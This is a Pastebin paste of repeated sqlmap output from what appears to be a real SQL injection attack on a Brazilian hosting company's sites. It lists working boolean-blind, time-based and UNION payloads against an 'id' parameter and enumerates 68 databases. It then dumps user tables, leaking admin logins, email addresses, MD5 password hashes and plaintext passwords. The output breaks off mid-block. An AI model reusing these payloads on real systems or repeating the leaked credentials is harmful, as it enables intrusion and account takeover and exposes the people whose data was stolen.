API tools faq
paste
Advertisement
Guest User

Untitled

a guest
May 30th, 2015
341
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 46.78 KB | None | 0 0
raw download clone embed print report
  1. sqlmap identified the following injection points with a total of 75 HTTP(s) requests:
  2. ---
  3. Parameter: id (GET)
  4. Type: boolean-based blind
  5. Title: AND boolean-based blind - WHERE or HAVING clause
  6. Payload: id=24 AND 2456=2456
  7.  
  8. Type: AND/OR time-based blind
  9. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  10. Payload: id=24 AND (SELECT * FROM (SELECT(SLEEP(5)))qQGx)
  11.  
  12. Type: UNION query
  13. Title: Generic UNION query (NULL) - 10 columns
  14. Payload: id=-7609 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171767871,0x55465a6d4c427666656d,0x71787a7671),NULL,NULL,NULL,NULL,NULL--
  15. ---
  16. web application technology: PHP 5.3.20, Apache 2.2.23
  17. back-end DBMS: MySQL 5.0.12
  18. available databases [68]:
  19. [*] information_schema
  20. [*] maga_adm
  21. [*] maga_agenda
  22. [*] maga_anael
  23. [*] maga_arq
  24. [*] maga_bene2
  25. [*] maga_bene3
  26. [*] maga_bene4
  27. [*] maga_bene5
  28. [*] maga_bene6
  29. [*] maga_cariocando
  30. [*] maga_corvete
  31. [*] maga_dekuhl
  32. [*] maga_dfitness2
  33. [*] maga_difibras
  34. [*] maga_difitness3
  35. [*] maga_doris
  36. [*] maga_edson
  37. [*] maga_fb
  38. [*] maga_fisiofisico
  39. [*] maga_fitlav
  40. [*] maga_flordamontanha
  41. [*] maga_imm
  42. [*] maga_imoveisweb
  43. [*] maga_info1000
  44. [*] maga_jardimintranet
  45. [*] maga_jardimpraiabeiramar
  46. [*] maga_jornalOxigenio
  47. [*] maga_jupa
  48. [*] maga_lock
  49. [*] maga_luizmanninovo
  50. [*] maga_magento
  51. [*] maga_mde
  52. [*] maga_mdenovosite
  53. [*] maga_mwproject
  54. [*] maga_naturana
  55. [*] maga_netpubli
  56. [*] maga_netrocinha
  57. [*] maga_news
  58. [*] maga_nooccontrole
  59. [*] maga_oficinadafolha
  60. [*] maga_phpcollab
  61. [*] maga_pinheiro
  62. [*] maga_pomoli
  63. [*] maga_recantonatural3
  64. [*] maga_revistateste
  65. [*] maga_ricardo
  66. [*] maga_riolazermoveis
  67. [*] maga_santarosa
  68. [*] maga_sisescola
  69. [*] maga_soc
  70. [*] maga_socagenda
  71. [*] maga_somimagem
  72. [*] maga_sr
  73. [*] maga_supercali
  74. [*] maga_tap
  75. [*] maga_testeggears
  76. [*] maga_unixpat
  77. [*] maga_urcasonica
  78. [*] maga_vygo
  79. [*] maga_vygomwproject
  80. [*] maga_webcalen
  81. [*] maga_webcalendar
  82. [*] maga_webftp
  83. [*] maga_wordpress
  84. [*] maga_yogaculture
  85. [*] maga_zog
  86. [*] maga_zoo
  87.  
  88. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  89. ---
  90. Parameter: id (GET)
  91. Type: boolean-based blind
  92. Title: AND boolean-based blind - WHERE or HAVING clause
  93. Payload: id=24 AND 2456=2456
  94.  
  95. Type: AND/OR time-based blind
  96. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  97. Payload: id=24 AND (SELECT * FROM (SELECT(SLEEP(5)))qQGx)
  98.  
  99. Type: UNION query
  100. Title: Generic UNION query (NULL) - 10 columns
  101. Payload: id=-7609 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171767871,0x55465a6d4c427666656d,0x71787a7671),NULL,NULL,NULL,NULL,NULL--
  102. ---
  103. web application technology: PHP 5.3.20, Apache 2.2.23
  104. back-end DBMS: MySQL 5.0.12
  105. Database: maga_webftp
  106. [4 tables]
  107. +-------------+
  108. | tbl_clients |
  109. | tbl_files |
  110. | tbl_options |
  111. | tbl_users |
  112. +-------------+
  113.  
  114. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  115. ---
  116. Parameter: id (GET)
  117. Type: boolean-based blind
  118. Title: AND boolean-based blind - WHERE or HAVING clause
  119. Payload: id=24 AND 2456=2456
  120.  
  121. Type: AND/OR time-based blind
  122. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  123. Payload: id=24 AND (SELECT * FROM (SELECT(SLEEP(5)))qQGx)
  124.  
  125. Type: UNION query
  126. Title: Generic UNION query (NULL) - 10 columns
  127. Payload: id=-7609 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171767871,0x55465a6d4c427666656d,0x71787a7671),NULL,NULL,NULL,NULL,NULL--
  128. ---
  129. web application technology: PHP 5.3.20, Apache 2.2.23
  130. back-end DBMS: MySQL 5.0.12
  131. Database: maga_webftp
  132. Table: tbl_users
  133. [7 columns]
  134. +-----------+-------------+
  135. | Column | Type |
  136. +-----------+-------------+
  137. | level | tinyint(1) |
  138. | timestamp | int(15) |
  139. | user | varchar(16) |
  140. | email | varchar(60) |
  141. | id | int(11) |
  142. | name | text |
  143. | password | varchar(32) |
  144. +-----------+-------------+
  145.  
  146. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  147. ---
  148. Parameter: id (GET)
  149. Type: boolean-based blind
  150. Title: AND boolean-based blind - WHERE or HAVING clause
  151. Payload: id=24 AND 2456=2456
  152.  
  153. Type: AND/OR time-based blind
  154. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  155. Payload: id=24 AND (SELECT * FROM (SELECT(SLEEP(5)))qQGx)
  156.  
  157. Type: UNION query
  158. Title: Generic UNION query (NULL) - 10 columns
  159. Payload: id=-7609 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171767871,0x55465a6d4c427666656d,0x71787a7671),NULL,NULL,NULL,NULL,NULL--
  160. ---
  161. web application technology: PHP 5.3.20, Apache 2.2.23
  162. back-end DBMS: MySQL 5.0.12
  163. Database: maga_webftp
  164. Table: tbl_users
  165. [1 entry]
  166. +--------+------------------------+----------------------------------+
  167. | user | email | password |
  168. +--------+------------------------+----------------------------------+
  169. | admin | contato@magaweb.com.br | 535ad661fb6052de10ab3b9cec335a46 |
  170. +--------+------------------------+----------------------------------+
  171.  
  172. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  173. ---
  174. Parameter: id (GET)
  175. Type: boolean-based blind
  176. Title: AND boolean-based blind - WHERE or HAVING clause
  177. Payload: id=24 AND 2456=2456
  178.  
  179. Type: AND/OR time-based blind
  180. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  181. Payload: id=24 AND (SELECT * FROM (SELECT(SLEEP(5)))qQGx)
  182.  
  183. Type: UNION query
  184. Title: Generic UNION query (NULL) - 10 columns
  185. Payload: id=-7609 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171767871,0x55465a6d4c427666656d,0x71787a7671),NULL,NULL,NULL,NULL,NULL--
  186. ---
  187. web application technology: PHP 5.3.20, Apache 2.2.23
  188. back-end DBMS: MySQL 5.0.12
  189. Database: maga_webftp
  190. Table: tbl_users
  191. [7 columns]
  192. +-----------+-------------+
  193. | Column | Type |
  194. +-----------+-------------+
  195. | level | tinyint(1) |
  196. | timestamp | int(15) |
  197. | user | varchar(16) |
  198. | email | varchar(60) |
  199. | id | int(11) |
  200. | name | text |
  201. | password | varchar(32) |
  202. +-----------+-------------+
  203.  
  204. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  205. ---
  206. Parameter: id (GET)
  207. Type: boolean-based blind
  208. Title: AND boolean-based blind - WHERE or HAVING clause
  209. Payload: id=24 AND 2456=2456
  210.  
  211. Type: AND/OR time-based blind
  212. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  213. Payload: id=24 AND (SELECT * FROM (SELECT(SLEEP(5)))qQGx)
  214.  
  215. Type: UNION query
  216. Title: Generic UNION query (NULL) - 10 columns
  217. Payload: id=-7609 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171767871,0x55465a6d4c427666656d,0x71787a7671),NULL,NULL,NULL,NULL,NULL--
  218. ---
  219. web application technology: PHP 5.3.20, Apache 2.2.23
  220. back-end DBMS: MySQL 5.0.12
  221. Database: maga_webftp
  222. [4 tables]
  223. +-------------+
  224. | tbl_clients |
  225. | tbl_files |
  226. | tbl_options |
  227. | tbl_users |
  228. +-------------+
  229.  
  230. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  231. ---
  232. Parameter: id (GET)
  233. Type: boolean-based blind
  234. Title: AND boolean-based blind - WHERE or HAVING clause
  235. Payload: id=24 AND 2456=2456
  236.  
  237. Type: AND/OR time-based blind
  238. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  239. Payload: id=24 AND (SELECT * FROM (SELECT(SLEEP(5)))qQGx)
  240.  
  241. Type: UNION query
  242. Title: Generic UNION query (NULL) - 10 columns
  243. Payload: id=-7609 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171767871,0x55465a6d4c427666656d,0x71787a7671),NULL,NULL,NULL,NULL,NULL--
  244. ---
  245. web application technology: PHP 5.3.20, Apache 2.2.23
  246. back-end DBMS: MySQL 5.0.12
  247. Database: maga_webftp
  248. Table: tbl_clients
  249. [10 columns]
  250. +-------------+-------------+
  251. | Column | Type |
  252. +-------------+-------------+
  253. | timestamp | int(15) |
  254. | address | text |
  255. | client_user | varchar(16) |
  256. | contact | text |
  257. | email | text |
  258. | id | int(11) |
  259. | name | text |
  260. | notify | tinyint(1) |
  261. | password | varchar(32) |
  262. | phone | text |
  263. +-------------+-------------+
  264.  
  265. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  266. ---
  267. Parameter: id (GET)
  268. Type: boolean-based blind
  269. Title: AND boolean-based blind - WHERE or HAVING clause
  270. Payload: id=24 AND 2456=2456
  271.  
  272. Type: AND/OR time-based blind
  273. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  274. Payload: id=24 AND (SELECT * FROM (SELECT(SLEEP(5)))qQGx)
  275.  
  276. Type: UNION query
  277. Title: Generic UNION query (NULL) - 10 columns
  278. Payload: id=-7609 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171767871,0x55465a6d4c427666656d,0x71787a7671),NULL,NULL,NULL,NULL,NULL--
  279. ---
  280. web application technology: PHP 5.3.20, Apache 2.2.23
  281. back-end DBMS: MySQL 5.0.12
  282. Database: maga_webftp
  283. Table: tbl_clients
  284. [1 entry]
  285. +---------------------+---------+---------+----------------------------------+
  286. | email | address | name | password |
  287. +---------------------+---------+---------+----------------------------------+
  288. | maga@magaweb.com.br | <blank> | marcelo | 827ccb0eea8a706c4c34a16891f84e7b |
  289. +---------------------+---------+---------+----------------------------------+
  290.  
  291. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  292. ---
  293. Parameter: id (GET)
  294. Type: boolean-based blind
  295. Title: AND boolean-based blind - WHERE or HAVING clause
  296. Payload: id=24 AND 2456=2456
  297.  
  298. Type: AND/OR time-based blind
  299. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  300. Payload: id=24 AND (SELECT * FROM (SELECT(SLEEP(5)))qQGx)
  301.  
  302. Type: UNION query
  303. Title: Generic UNION query (NULL) - 10 columns
  304. Payload: id=-7609 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171767871,0x55465a6d4c427666656d,0x71787a7671),NULL,NULL,NULL,NULL,NULL--
  305. ---
  306. web application technology: PHP 5.3.20, Apache 2.2.23
  307. back-end DBMS: MySQL 5.0.12
  308. available databases [68]:
  309. [*] information_schema
  310. [*] maga_adm
  311. [*] maga_agenda
  312. [*] maga_anael
  313. [*] maga_arq
  314. [*] maga_bene2
  315. [*] maga_bene3
  316. [*] maga_bene4
  317. [*] maga_bene5
  318. [*] maga_bene6
  319. [*] maga_cariocando
  320. [*] maga_corvete
  321. [*] maga_dekuhl
  322. [*] maga_dfitness2
  323. [*] maga_difibras
  324. [*] maga_difitness3
  325. [*] maga_doris
  326. [*] maga_edson
  327. [*] maga_fb
  328. [*] maga_fisiofisico
  329. [*] maga_fitlav
  330. [*] maga_flordamontanha
  331. [*] maga_imm
  332. [*] maga_imoveisweb
  333. [*] maga_info1000
  334. [*] maga_jardimintranet
  335. [*] maga_jardimpraiabeiramar
  336. [*] maga_jornalOxigenio
  337. [*] maga_jupa
  338. [*] maga_lock
  339. [*] maga_luizmanninovo
  340. [*] maga_magento
  341. [*] maga_mde
  342. [*] maga_mdenovosite
  343. [*] maga_mwproject
  344. [*] maga_naturana
  345. [*] maga_netpubli
  346. [*] maga_netrocinha
  347. [*] maga_news
  348. [*] maga_nooccontrole
  349. [*] maga_oficinadafolha
  350. [*] maga_phpcollab
  351. [*] maga_pinheiro
  352. [*] maga_pomoli
  353. [*] maga_recantonatural3
  354. [*] maga_revistateste
  355. [*] maga_ricardo
  356. [*] maga_riolazermoveis
  357. [*] maga_santarosa
  358. [*] maga_sisescola
  359. [*] maga_soc
  360. [*] maga_socagenda
  361. [*] maga_somimagem
  362. [*] maga_sr
  363. [*] maga_supercali
  364. [*] maga_tap
  365. [*] maga_testeggears
  366. [*] maga_unixpat
  367. [*] maga_urcasonica
  368. [*] maga_vygo
  369. [*] maga_vygomwproject
  370. [*] maga_webcalen
  371. [*] maga_webcalendar
  372. [*] maga_webftp
  373. [*] maga_wordpress
  374. [*] maga_yogaculture
  375. [*] maga_zog
  376. [*] maga_zoo
  377.  
  378. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  379. ---
  380. Parameter: id (GET)
  381. Type: boolean-based blind
  382. Title: AND boolean-based blind - WHERE or HAVING clause
  383. Payload: id=24 AND 2456=2456
  384.  
  385. Type: AND/OR time-based blind
  386. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  387. Payload: id=24 AND (SELECT * FROM (SELECT(SLEEP(5)))qQGx)
  388.  
  389. Type: UNION query
  390. Title: Generic UNION query (NULL) - 10 columns
  391. Payload: id=-7609 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171767871,0x55465a6d4c427666656d,0x71787a7671),NULL,NULL,NULL,NULL,NULL--
  392. ---
  393. web application technology: PHP 5.3.20, Apache 2.2.23
  394. back-end DBMS: MySQL 5.0.12
  395. Database: maga_wordpress
  396. [10 tables]
  397. +-------------------+
  398. | wp_categories |
  399. | wp_comments |
  400. | wp_linkcategories |
  401. | wp_links |
  402. | wp_options |
  403. | wp_post2cat |
  404. | wp_postmeta |
  405. | wp_posts |
  406. | wp_usermeta |
  407. | wp_users |
  408. +-------------------+
  409.  
  410. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  411. ---
  412. Parameter: id (GET)
  413. Type: boolean-based blind
  414. Title: AND boolean-based blind - WHERE or HAVING clause
  415. Payload: id=24 AND 2456=2456
  416.  
  417. Type: AND/OR time-based blind
  418. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  419. Payload: id=24 AND (SELECT * FROM (SELECT(SLEEP(5)))qQGx)
  420.  
  421. Type: UNION query
  422. Title: Generic UNION query (NULL) - 10 columns
  423. Payload: id=-7609 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171767871,0x55465a6d4c427666656d,0x71787a7671),NULL,NULL,NULL,NULL,NULL--
  424. ---
  425. web application technology: PHP 5.3.20, Apache 2.2.23
  426. back-end DBMS: MySQL 5.0.12
  427. Database: maga_wordpress
  428. Table: wp_users
  429. [10 columns]
  430. +---------------------+---------------------+
  431. | Column | Type |
  432. +---------------------+---------------------+
  433. | display_name | varchar(250) |
  434. | ID | bigint(20) unsigned |
  435. | user_activation_key | varchar(60) |
  436. | user_email | varchar(100) |
  437. | user_login | varchar(60) |
  438. | user_nicename | varchar(50) |
  439. | user_pass | varchar(64) |
  440. | user_registered | datetime |
  441. | user_status | int(11) |
  442. | user_url | varchar(100) |
  443. +---------------------+---------------------+
  444.  
  445. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  446. ---
  447. Parameter: id (GET)
  448. Type: boolean-based blind
  449. Title: AND boolean-based blind - WHERE or HAVING clause
  450. Payload: id=24 AND 2456=2456
  451.  
  452. Type: AND/OR time-based blind
  453. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  454. Payload: id=24 AND (SELECT * FROM (SELECT(SLEEP(5)))qQGx)
  455.  
  456. Type: UNION query
  457. Title: Generic UNION query (NULL) - 10 columns
  458. Payload: id=-7609 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171767871,0x55465a6d4c427666656d,0x71787a7671),NULL,NULL,NULL,NULL,NULL--
  459. ---
  460. web application technology: PHP 5.3.20, Apache 2.2.23
  461. back-end DBMS: MySQL 5.0.12
  462. Database: maga_wordpress
  463. Table: wp_users
  464. [1 entry]
  465. +----+----------+----------------------------------+------------+------------------------+-------------+--------------+---------------+---------------------+---------------------+
  466. | ID | user_url | user_pass | user_login | user_email | user_status | display_name | user_nicename | user_registered | user_activation_key |
  467. +----+----------+----------------------------------+------------+------------------------+-------------+--------------+---------------+---------------------+---------------------+
  468. | 1 | <blank> | 535ad661fb6052de10ab3b9cec335a46 | admin | contato@magaweb.com.br | 0 | contato | admin | 2006-11-24 00:05:38 | <blank> |
  469. +----+----------+----------------------------------+------------+------------------------+-------------+--------------+---------------+---------------------+---------------------+
  470.  
  471. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  472. ---
  473. Parameter: id (GET)
  474. Type: boolean-based blind
  475. Title: AND boolean-based blind - WHERE or HAVING clause
  476. Payload: id=24 AND 2456=2456
  477.  
  478. Type: AND/OR time-based blind
  479. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  480. Payload: id=24 AND (SELECT * FROM (SELECT(SLEEP(5)))qQGx)
  481.  
  482. Type: UNION query
  483. Title: Generic UNION query (NULL) - 10 columns
  484. Payload: id=-7609 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171767871,0x55465a6d4c427666656d,0x71787a7671),NULL,NULL,NULL,NULL,NULL--
  485. ---
  486. web application technology: PHP 5.3.20, Apache 2.2.23
  487. back-end DBMS: MySQL 5.0.12
  488. Database: maga_jardimintranet
  489. [6 tables]
  490. +----------------------+
  491. | clientes |
  492. | daime_tipos |
  493. | distribuicao |
  494. | estoque_movimentacao |
  495. | gastos_extras |
  496. | usuario |
  497. +----------------------+
  498.  
  499. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  500. ---
  501. Parameter: id (GET)
  502. Type: boolean-based blind
  503. Title: AND boolean-based blind - WHERE or HAVING clause
  504. Payload: id=24 AND 2456=2456
  505.  
  506. Type: AND/OR time-based blind
  507. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  508. Payload: id=24 AND (SELECT * FROM (SELECT(SLEEP(5)))qQGx)
  509.  
  510. Type: UNION query
  511. Title: Generic UNION query (NULL) - 10 columns
  512. Payload: id=-7609 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171767871,0x55465a6d4c427666656d,0x71787a7671),NULL,NULL,NULL,NULL,NULL--
  513. ---
  514. web application technology: PHP 5.3.20, Apache 2.2.23
  515. back-end DBMS: MySQL 5.0.12
  516. Database: maga_jardimintranet
  517. Table: usuario
  518. [10 columns]
  519. +-----------------+------------------+
  520. | Column | Type |
  521. +-----------------+------------------+
  522. | ativo | int(10) unsigned |
  523. | data_cadastro | date |
  524. | departamento_id | int(10) unsigned |
  525. | descricao | longtext |
  526. | email | varchar(100) |
  527. | nivel_acesso | int(10) unsigned |
  528. | nome_real | varchar(50) |
  529. | nome_usuario | varchar(20) |
  530. | senha | varchar(20) |
  531. | usuario_id | int(10) unsigned |
  532. +-----------------+------------------+
  533.  
  534. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  535. ---
  536. Parameter: id (GET)
  537. Type: boolean-based blind
  538. Title: AND boolean-based blind - WHERE or HAVING clause
  539. Payload: id=24 AND 2456=2456
  540.  
  541. Type: AND/OR time-based blind
  542. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  543. Payload: id=24 AND (SELECT * FROM (SELECT(SLEEP(5)))qQGx)
  544.  
  545. Type: UNION query
  546. Title: Generic UNION query (NULL) - 10 columns
  547. Payload: id=-7609 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171767871,0x55465a6d4c427666656d,0x71787a7671),NULL,NULL,NULL,NULL,NULL--
  548. ---
  549. web application technology: PHP 5.3.20, Apache 2.2.23
  550. back-end DBMS: MySQL 5.0.12
  551. Database: maga_adm
  552. [2 tables]
  553. +--------------------+
  554. | sis_boleto_cliente |
  555. | sis_boletos |
  556. +--------------------+
  557.  
  558. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  559. ---
  560. Parameter: id (GET)
  561. Type: boolean-based blind
  562. Title: AND boolean-based blind - WHERE or HAVING clause
  563. Payload: id=24 AND 2456=2456
  564.  
  565. Type: AND/OR time-based blind
  566. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  567. Payload: id=24 AND (SELECT * FROM (SELECT(SLEEP(5)))qQGx)
  568.  
  569. Type: UNION query
  570. Title: Generic UNION query (NULL) - 10 columns
  571. Payload: id=-7609 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171767871,0x55465a6d4c427666656d,0x71787a7671),NULL,NULL,NULL,NULL,NULL--
  572. ---
  573. web application technology: PHP 5.3.20, Apache 2.2.23
  574. back-end DBMS: MySQL 5.0.12
  575. Database: maga_dekuhl
  576. [10 tables]
  577. +-----------------+
  578. | adm_usuario |
  579. | compromisso |
  580. | conteudo |
  581. | conteudo_perfil |
  582. | jurisprudencias |
  583. | perfil |
  584. | tribunais |
  585. | usuario |
  586. | usuario_dados |
  587. | usuario_perfil |
  588. +-----------------+
  589.  
  590. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  591. ---
  592. Parameter: id (GET)
  593. Type: boolean-based blind
  594. Title: AND boolean-based blind - WHERE or HAVING clause
  595. Payload: id=24 AND 2456=2456
  596.  
  597. Type: AND/OR time-based blind
  598. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  599. Payload: id=24 AND (SELECT * FROM (SELECT(SLEEP(5)))qQGx)
  600.  
  601. Type: UNION query
  602. Title: Generic UNION query (NULL) - 10 columns
  603. Payload: id=-7609 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171767871,0x55465a6d4c427666656d,0x71787a7671),NULL,NULL,NULL,NULL,NULL--
  604. ---
  605. web application technology: PHP 5.3.20, Apache 2.2.23
  606. back-end DBMS: MySQL 5.0.12
  607. Database: maga_dekuhl
  608. Table: adm_usuario
  609. [10 columns]
  610. +-----------------+------------------+
  611. | Column | Type |
  612. +-----------------+------------------+
  613. | ativo | int(10) unsigned |
  614. | data_cadastro | date |
  615. | departamento_id | int(10) unsigned |
  616. | descricao | longtext |
  617. | email | varchar(100) |
  618. | nivel_acesso | int(10) unsigned |
  619. | nome_real | varchar(50) |
  620. | nome_usuario | varchar(20) |
  621. | senha | varchar(20) |
  622. | usuario_id | int(10) unsigned |
  623. +-----------------+------------------+
  624.  
  625. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  626. ---
  627. Parameter: id (GET)
  628. Type: boolean-based blind
  629. Title: AND boolean-based blind - WHERE or HAVING clause
  630. Payload: id=24 AND 2456=2456
  631.  
  632. Type: AND/OR time-based blind
  633. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  634. Payload: id=24 AND (SELECT * FROM (SELECT(SLEEP(5)))qQGx)
  635.  
  636. Type: UNION query
  637. Title: Generic UNION query (NULL) - 10 columns
  638. Payload: id=-7609 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171767871,0x55465a6d4c427666656d,0x71787a7671),NULL,NULL,NULL,NULL,NULL--
  639. ---
  640. web application technology: PHP 5.3.20, Apache 2.2.23
  641. back-end DBMS: MySQL 5.0.12
  642. Database: maga_dekuhl
  643. Table: adm_usuario
  644. [1 entry]
  645. +------------+-----------------+-------+-------+----------------------+----------------------------------+--------------------------+--------------+--------------+---------------+
  646. | usuario_id | departamento_id | senha | ativo | email | descricao | nome_real | nivel_acesso | nome_usuario | data_cadastro |
  647. +------------+-----------------+-------+-------+----------------------+----------------------------------+--------------------------+--------------+--------------+---------------+
  648. | 1 | 1 | 12345 | 1 | admin@empresa.com.br | Usuбrio administrador do sistema | Administrador do Sistema | 3 | adm | 2003-09-29 |
  649. +------------+-----------------+-------+-------+----------------------+----------------------------------+--------------------------+--------------+--------------+---------------+
  650.  
  651. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  652. ---
  653. Parameter: id (GET)
  654. Type: boolean-based blind
  655. Title: AND boolean-based blind - WHERE or HAVING clause
  656. Payload: id=24 AND 2456=2456
  657.  
  658. Type: AND/OR time-based blind
  659. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  660. Payload: id=24 AND (SELECT * FROM (SELECT(SLEEP(5)))qQGx)
  661.  
  662. Type: UNION query
  663. Title: Generic UNION query (NULL) - 10 columns
  664. Payload: id=-7609 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171767871,0x55465a6d4c427666656d,0x71787a7671),NULL,NULL,NULL,NULL,NULL--
  665. ---
  666. web application technology: PHP 5.3.20, Apache 2.2.23
  667. back-end DBMS: MySQL 5.0.12
  668. Database: maga_dekuhl
  669. Table: usuario
  670. [5 columns]
  671. +--------+--------------+
  672. | Column | Type |
  673. +--------+--------------+
  674. | email | varchar(100) |
  675. | id | smallint(6) |
  676. | login | varchar(30) |
  677. | nome | varchar(200) |
  678. | senha | varchar(30) |
  679. +--------+--------------+
  680.  
  681. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  682. ---
  683. Parameter: id (GET)
  684. Type: boolean-based blind
  685. Title: AND boolean-based blind - WHERE or HAVING clause
  686. Payload: id=24 AND 2456=2456
  687.  
  688. Type: AND/OR time-based blind
  689. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  690. Payload: id=24 AND (SELECT * FROM (SELECT(SLEEP(5)))qQGx)
  691.  
  692. Type: UNION query
  693. Title: Generic UNION query (NULL) - 10 columns
  694. Payload: id=-7609 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171767871,0x55465a6d4c427666656d,0x71787a7671),NULL,NULL,NULL,NULL,NULL--
  695. ---
  696. web application technology: PHP 5.3.20, Apache 2.2.23
  697. back-end DBMS: MySQL 5.0.12
  698. Database: maga_dekuhl
  699. Table: usuario
  700. [2 entries]
  701. +----+------------------+----------+---------+-------+
  702. | id | nome | senha | login | email |
  703. +----+------------------+----------+---------+-------+
  704. | 7 | dekuhl advogados | thayna96 | dekuhl | NULL |
  705. | 5 | rodrigo | thayna96 | rodrigo | NULL |
  706. +----+------------------+----------+---------+-------+
  707.  
  708. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  709. ---
  710. Parameter: id (GET)
  711. Type: boolean-based blind
  712. Title: AND boolean-based blind - WHERE or HAVING clause
  713. Payload: id=24 AND 2456=2456
  714.  
  715. Type: AND/OR time-based blind
  716. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  717. Payload: id=24 AND (SELECT * FROM (SELECT(SLEEP(5)))qQGx)
  718.  
  719. Type: UNION query
  720. Title: Generic UNION query (NULL) - 10 columns
  721. Payload: id=-7609 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171767871,0x55465a6d4c427666656d,0x71787a7671),NULL,NULL,NULL,NULL,NULL--
  722. ---
  723. web application technology: PHP 5.3.20, Apache 2.2.23
  724. back-end DBMS: MySQL 5.0.12
  725. Database: maga_fb
  726. [8 tables]
  727. +--------------+
  728. | atalhos |
  729. | conteudo |
  730. | conteudo_bkp |
  731. | dicas_do_dia |
  732. | links |
  733. | noticias |
  734. | propriedades |
  735. | usuario |
  736. +--------------+
  737.  
  738. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  739. ---
  740. Parameter: id (GET)
  741. Type: boolean-based blind
  742. Title: AND boolean-based blind - WHERE or HAVING clause
  743. Payload: id=24 AND 2456=2456
  744.  
  745. Type: AND/OR time-based blind
  746. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  747. Payload: id=24 AND (SELECT * FROM (SELECT(SLEEP(5)))qQGx)
  748.  
  749. Type: UNION query
  750. Title: Generic UNION query (NULL) - 10 columns
  751. Payload: id=-7609 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171767871,0x55465a6d4c427666656d,0x71787a7671),NULL,NULL,NULL,NULL,NULL--
  752. ---
  753. web application technology: PHP 5.3.20, Apache 2.2.23
  754. back-end DBMS: MySQL 5.0.12
  755. Database: maga_fb
  756. Table: usuario
  757. [10 columns]
  758. +-----------------+------------------+
  759. | Column | Type |
  760. +-----------------+------------------+
  761. | ativo | int(10) unsigned |
  762. | data_cadastro | date |
  763. | departamento_id | int(10) unsigned |
  764. | descricao | longtext |
  765. | email | varchar(100) |
  766. | nivel_acesso | int(10) unsigned |
  767. | nome_real | varchar(50) |
  768. | nome_usuario | varchar(20) |
  769. | senha | varchar(20) |
  770. | usuario_id | int(10) unsigned |
  771. +-----------------+------------------+
  772.  
  773. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  774. ---
  775. Parameter: id (GET)
  776. Type: boolean-based blind
  777. Title: AND boolean-based blind - WHERE or HAVING clause
  778. Payload: id=24 AND 2456=2456
  779.  
  780. Type: AND/OR time-based blind
  781. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  782. Payload: id=24 AND (SELECT * FROM (SELECT(SLEEP(5)))qQGx)
  783.  
  784. Type: UNION query
  785. Title: Generic UNION query (NULL) - 10 columns
